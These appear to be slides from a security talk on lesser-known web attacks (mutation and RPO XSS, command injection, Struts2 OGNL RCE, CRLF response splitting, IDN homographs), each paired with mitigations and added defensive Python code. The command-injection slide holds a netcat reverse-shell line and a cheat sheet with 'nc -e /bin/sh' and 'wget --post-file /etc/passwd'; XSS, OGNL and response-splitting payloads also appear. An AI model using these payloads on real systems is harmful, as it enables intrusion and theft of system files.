Lesser Known Webapp Attacks
By Ninad Sarang
LesserKnownWebAppAttacks
About me
• Consultant at Aujas Networks
• Part time bug hunter
• Individual Security researcher
• Blogger
http://infinite8security.blogspot.in
Menu Card
Cross site scripting –
• Mutation XSS
• RPO XSS
• Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
It’s all about PoPuP
Cross site Scripting-
Mutation XSS
• HTML encoded payload:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
• We place this markup in a page and read it back through the innerHTML property:
<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>
• When this code runs, the browser looks up the element with document.getElementById('x') and serialises its innerHTML.
• That serialisation adds another level of decoding, so the payload that was safe as encoded text mutates into an unsafe state (live markup) once it is written back via innerHTML.
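To make the "safe to unsafe" mutation concrete, here is an added example (written for this page, not the author's code) that models the innerHTML quirk the cure53 paper describes for <listing> and <xmp>: their innerHTML getter returned the decoded text without re-escaping it. The model and the check that follows are assumptions of this example, not browser code; the defender's check is the one a sanitizer needs: parse-then-serialise must be a fixed point, otherwise the fragment mutates and cannot be trusted.

```python
import html

# Model of how an element's innerHTML getter serialises a text child
# (constructed for this example, not browser code).  Per the cure53
# mXSS paper, <listing> and <xmp> returned the decoded text without
# re-escaping it; ordinary elements re-escape.
QUIRKY_TAGS = {"listing", "xmp"}

# The page's payload: harmless while it is entity-encoded text.
ENCODED_PAYLOAD = "&lt;img src=1 onerror=alert(1)&gt;"


def parse_text_child(markup):
    """The parser turns entity-encoded text into a text node (one decode)."""
    return html.unescape(markup)


def innerhtml_getter(tag, text_node, quirk=True):
    """What element.innerHTML returns for an element holding one text node."""
    if quirk and tag in QUIRKY_TAGS:
        return text_node  # decoded text leaks out without re-escaping
    return html.escape(text_node, quote=False)


def copied_markup(tag, markup, quirk=True):
    """Markup that reaches the parser when innerHTML is copied elsewhere."""
    return innerhtml_getter(tag, parse_text_child(markup), quirk)


def is_serialisation_fixed_point(tag, markup, quirk=True):
    """Defender's check: parse + serialise must give back the same string.
    A fragment that changes under this round trip mutates and is unsafe."""
    return copied_markup(tag, markup, quirk) == markup


def contains_live_tag(markup):
    """True once the fragment would be parsed as an element rather than text."""
    return "<" in markup


if __name__ == "__main__":
    for tag in ("div", "listing"):
        print(tag, "->", copied_markup(tag, ENCODED_PAYLOAD),
              "fixed point:", is_serialisation_fixed_point(tag, ENCODED_PAYLOAD))
```

Running the block shows the same encoded payload staying encoded when copied out of a div and coming back as a live img tag when copied out of a listing; the fixed-point check is what catches the second case without needing to know the specific quirk.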
Mitigation:
Server-side mitigation
• Avoid outputting server content that the browser would otherwise convert incorrectly.
• Replace the flawed content with semantically equivalent content that the browser converts properly.
Client-side mitigation
• Browsers should implement ECMAScript 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all of the user agents.
• https://cure53.de/fp170.pdf
Cross site Scripting-
RPO XSS
Relative Path Overwrite XSS
• Difference between absolute and relative URLs
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this finding, three things are necessary:
1) Stored XSS that allows CSS injection.
2) URL rewriting.
3) Relative addressing of the CSS style sheet.
DEMO
• Step 1: Let's visit www.webdevelopersnotes.com/graphics/index.php3
• To check URL re-writing, add ‘/’
• Open the re-written URL with the XSS payload in IE and see the magic ;)
• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs be used throughout a site.
• Otherwise, root-relative URLs should be used.
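The three preconditions and the demo's trailing-slash trick come down to URL resolution, so here is an added example (not the author's or the demo site's code) showing with the standard library exactly where a browser fetches a stylesheet from before and after the rewrite, and why the mitigation works. The host example.test is a placeholder; the path mirrors the demo page.

```python
from urllib.parse import urljoin

# Placeholder host; the path mirrors the demo page /graphics/index.php3.
PAGE = "http://example.test/graphics/index.php3"


def stylesheet_url(page_url, href):
    """Where the browser fetches <link rel=stylesheet href=...> from."""
    return urljoin(page_url, href)


def rewritten_url(page_url):
    """The demo's URL-rewriting check: a trailing '/' the server ignores,
    but which the browser treats as one more directory level."""
    return page_url + "/"


def rpo_exposed(page_url, href):
    """True if, with the trailing '/', the relative href resolves back under
    the page itself, so the page's own output (which a stored XSS can
    influence) is fetched and parsed as CSS."""
    resolved = stylesheet_url(rewritten_url(page_url), href)
    return resolved.startswith(page_url + "/")


if __name__ == "__main__":
    for href in ("style.css", "/css/style.css", "https://cdn.example.test/style.css"):
        print(href, "->", stylesheet_url(rewritten_url(PAGE), href),
              "exposed:", rpo_exposed(PAGE, href))
```

A document-relative href ("style.css") is the only one that moves with the rewritten path; a root-relative href ("/css/style.css") or an absolute URL resolves to the same place regardless of how the page URL is rewritten, which is the whole of the mitigation.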
Cross site Scripting-
Zombie XSS
Remote/OS Command Execution
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Now what if ( ; ) is blocked by the application?
• X ; Y = Separating commands (run X and then Y, regardless of success of X)
• X | Y = PIPE (run X and pass output of X to Y)
• X ^ Y = PIPE (alternate pipe syntax)
• X && Y = AND (run Y if X succeeded)
• X || Y = OR (run Y if X failed)
• X %0D Y %0D Z = OR (%0D is a URL-encoded carriage return)
• ` X ` = Backtick
• X & Y = Background (run Y and then run X in background, regardless of success of X)
• $( command )
• nc -e /bin/sh = Netcat
• wget --post-file /etc/passwd = WGET
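Every separator in the list above only matters if the user's value is handed to a shell. The added example below (written for this page, not the author's code) shows the defender's two views of the same input: a detection check that flags any of those separators after URL-decoding (so %0D and %0A are caught as CR/LF), and the fix for a "ping this host" feature, which allow-lists a hostname and passes it as an argv element so no shell ever parses it. Host names and the regex are this example's own.

```python
import re
import subprocess
from urllib.parse import unquote

# Shell control sequences from the list above, matched after URL-decoding
# so that %0D / %0A become CR / LF.
SHELL_METACHARS = re.compile(r"[;|&^`$\r\n<>()]")

# Allow-list for the one thing a "ping" feature needs: a syntactically
# valid hostname (labels of 1-63 chars, no leading/trailing hyphen).
HOSTNAME = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def has_shell_metachars(user_input):
    """Detection view: does the decoded input carry any command separator?"""
    return SHELL_METACHARS.search(unquote(user_input)) is not None


def validate_host(user_input):
    """Prevention view: accept only a hostname, reject everything else."""
    decoded = unquote(user_input)
    if len(decoded) > 253 or not HOSTNAME.match(decoded):
        raise ValueError("not a hostname: %r" % decoded)
    return decoded


def is_valid_host(user_input):
    try:
        validate_host(user_input)
        return True
    except ValueError:
        return False


def ping_argv(user_input):
    """argv for the OS command.  An argument list never reaches a shell,
    so separators inside the value cannot start a second command."""
    return ["ping", "-c", "1", validate_host(user_input)]


def run_ping(user_input):
    # shell=False is the default: no shell parses these arguments.
    return subprocess.run(ping_argv(user_input), capture_output=True, text=True)


if __name__ == "__main__":
    for value in ("www.example.test",
                  "www.example.test && nc -vn 192.0.2.10 4444 -e /bin/bash",
                  "www.example.test%0Dnc%20-e%20/bin/sh"):
        print(repr(value), "metachars:", has_shell_metachars(value),
              "valid host:", is_valid_host(value))
```

The allow-list is the control that holds; the metacharacter scan is useful for logging and alerting but, as the slide shows, there is always one more separator than the deny-list knows about.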
RCE never dies!!!
• The "action:", "redirect:" or "redirectAction:" prefixes are not properly sanitized.
• The information is evaluated as an OGNL (Object-Graph Navigation Language) expression against the value stack, which introduces the possibility of injecting server-side code.
Apache Struts2 RCE
http://host/struts2-blank/example/X.action?action:${3*4}
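Because the vulnerable input is a parameter name carrying one of three fixed prefixes, the requests are easy to pick out of web server logs. This added example (written for this page, not the project's or the author's code) scans access-log lines for the prefixes named above after URL-decoding the request target; the log lines are constructed for the example and use documentation IP addresses.

```python
import re
from urllib.parse import unquote

# Parameter-name prefixes named on the slide, which Struts 2 evaluated
# as OGNL.  Detection-only example written for this page.
OGNL_PREFIX = re.compile(r"(?:^|[?&])(action|redirect|redirectAction):",
                         re.IGNORECASE)
# Request line inside an Apache/nginx combined-format log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def struts_prefix_in(target):
    """Return the lower-cased prefix found in a request target, else None."""
    m = OGNL_PREFIX.search(unquote(target))
    return m.group(1).lower() if m else None


def scan_access_log(lines):
    """Return (client_ip, prefix, target) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        prefix = struts_prefix_in(m.group("target"))
        if prefix:
            hits.append((line.split()[0], prefix, m.group("target")))
    return hits


# Constructed sample log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/May/2014:10:00:01 +0530] "GET /struts2-blank/example/HelloWorld.action?name=ninad HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/May/2014:10:00:02 +0530] "GET /struts2-blank/example/X.action?action:%24%7B3*4%7D HTTP/1.1" 200 75',
    '203.0.113.9 - - [14/May/2014:10:00:03 +0530] "GET /struts2-blank/example/X.action?redirect:http://phish.example/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, prefix, target in scan_access_log(SAMPLE_LOG):
        print(ip, prefix, target)
```

Decoding before matching matters: the page's ${3*4} probe arrives as %24%7B3*4%7D, and the prefix itself can be percent-encoded too. Patching Struts is the fix; this is the way to find out whether anyone tried before the patch landed.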
DEMO
Divide and Conquer: CR-LF Attack
• CR stands for Carriage Return (CR, ASCII 13, \r)
• LF stands for Line Feed (LF, ASCII 10, \n)
How does this attack work?
The server script embeds user data in HTTP response headers.
Example: Step 1: There is a redirection page “redir_lang.jsp”. When the index page is hit, the server builds its response with the following code:
<%
response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang"));
%>
Let's Attack ;)
Step 3: Instead of passing the value English, let's pass our attack vector as shown:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Note: We have URL-encoded the CRLF sequences.
Let's see what the server responds with:
The server's response stream, as annotated in the figure:
• A first HTTP response, which is a 302 (redirection) response.
• A second HTTP response, which is a 200 response, with content comprising 19 bytes of HTML.
• Superfluous data.
So when the attacker feeds the target with two requests, the first being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
and the second to the URL /index.html,
the target would believe that the first request is matched to the first response, and that the second request (to /index.html) is matched to the second response.
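The split into "first response / second response / superfluous data" is a consequence of how a client or proxy reads responses off the wire: status line, headers, then Content-Length bytes of body, repeat. The added example below (written for this page, not the author's code) models redir_lang.jsp, feeds it the page's attack vector, and parses the resulting byte stream the way a client would; it also shows the one-line server-side fix, refusing CR or LF in any header value. The model's status text and the strict flag are this example's own choices.

```python
from urllib.parse import unquote


def is_safe_header_value(value):
    """A header value may never contain CR or LF; otherwise the client reads
    what follows as further headers, or as a whole new response."""
    return "\r" not in value and "\n" not in value


def build_redirect(lang, strict=False):
    """Model of redir_lang.jsp: the lang parameter lands in the Location
    header of a 302.  strict=True is the fix; strict=False is the bug."""
    value = unquote(lang)
    if strict and not is_safe_header_value(value):
        raise ValueError("CR/LF in header value")
    return (b"HTTP/1.1 302 Moved Temporarily\r\n"
            b"Location: /by_lang.jsp?lang=" + value.encode("latin-1") + b"\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n")


def parse_responses(stream):
    """Read responses off a byte stream as a client or proxy would.
    Returns ([(status_line, headers, body), ...], leftover_bytes)."""
    responses = []
    rest = stream
    while rest.startswith(b"HTTP/"):
        head, sep, rest = rest.partition(b"\r\n\r\n")
        if not sep:
            break
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, val = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = val.strip().decode("latin-1")
        length = int(headers.get("content-length", "0"))
        body, rest = rest[:length], rest[length:]
        responses.append((lines[0].decode("latin-1"), headers, body))
    return responses, rest


def describe(lang):
    """Status lines of every response the client would see, plus leftovers."""
    responses, rest = parse_responses(build_redirect(lang))
    return [status for status, _, _ in responses], rest


# The page's attack vector, URL-encoded exactly as it is sent.
ATTACK = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
          "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
          "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>")

if __name__ == "__main__":
    print(describe("English"))
    print(describe(ATTACK))
```

With lang=English the stream holds one 302 and nothing else. With the attack vector the injected Content-Length: 0 terminates the 302 early, the client then sees a complete 200 whose 19-byte body is <html>Shazam</html>, and the server's own trailing Content-Length header is left over as the superfluous data in the figure. With strict=True the same input never becomes a header at all.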
What can an attacker do with a CRLF attack?
• Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection
• Web cache poisoning (defacement)
• Cross user attacks (single user, single page, temporary defacement)
• Hijacking pages with user-specific information
• Browser cache poisoning
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
What is this all about?
http://ebаy.com/
Converted to punycode:
http://xn--eby-7cd.com/
The “а” is a letter from the Cyrillic alphabet, not the Latin “a”.
What can an attacker do with a homograph attack?
• Phishing
• Un-validated redirection
• Fake websites
• Attacker may combine this with SSL attacks
http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
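The punycode conversion above and the display-side mitigation both reduce to the same two operations, so here is one added example (written for this page, not the author's code) covering both: the standard-library IDNA encoder reproduces xn--eby-7cd.com from the spoofed name with a Cyrillic а (U+0430), and a mixed-script check, modelled on the policy browsers use when deciding whether to show the Unicode form, falls back to punycode so the substitution cannot hide. The script heuristic built from Unicode character names is this example's own simplification.

```python
import unicodedata

# The slide's spoof: "ebay.com" with a Cyrillic а (U+0430) in place of
# the Latin a.  Constructed for this example.
HOMOGRAPH = "eb\u0430y.com"
GENUINE = "ebay.com"


def to_punycode(host):
    """ASCII form of an internationalised hostname: what DNS actually resolves."""
    return host.encode("idna").decode("ascii")


def script_of(char):
    """Script name taken from the Unicode character name, e.g. LATIN or CYRILLIC
    (a simplification of the real Unicode Script property)."""
    name = unicodedata.name(char, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def scripts_in_label(label):
    return {script_of(c) for c in label if c.isalpha()}


def is_mixed_script(host):
    """True if any DNS label mixes letters from more than one script, the
    condition under which browsers refuse to show the Unicode form."""
    return any(len(scripts_in_label(label)) > 1 for label in host.split("."))


def display_form(host):
    """Show punycode for suspicious names so the Cyrillic letter cannot hide."""
    return to_punycode(host) if is_mixed_script(host) else host


if __name__ == "__main__":
    for host in (GENUINE, HOMOGRAPH):
        print(repr(host), "->", to_punycode(host), "| displayed as:", display_form(host))
```

Whole-script confusables (a name written entirely in Cyrillic that happens to look Latin) slip past a mixed-script rule, which is why real browser policies add per-script confusable tables on top of this check.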
Mitigation
Before / After
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad

Null 14 may_lesser_known_attacks_by_ninadsarang
